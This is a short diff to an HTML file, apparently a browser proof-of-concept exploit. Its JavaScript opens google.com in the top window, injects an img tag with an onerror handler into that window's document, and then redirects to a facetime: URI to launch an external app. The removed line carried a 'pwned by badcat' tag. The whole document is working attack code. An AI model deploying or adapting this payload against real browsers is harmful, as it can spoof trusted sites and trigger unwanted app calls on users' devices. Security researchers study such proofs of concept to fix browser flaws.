--- a/bravex.html
+++ b/bravex.html
@@ -2,7 +2,7 @@
 function y(){
  
         x=open('http://google.com','_top')
-        x.document.body.innerHTML='<img/src=""onerror="setTimeout(function() {location.replace(\'facetime:pwned+by+badcat\')}, 150)">'
+        x.document.body.innerHTML='<img/src=""onerror="setTimeout(function() {location.replace(\'facetime:\')}, 150)">'
    
     
 };
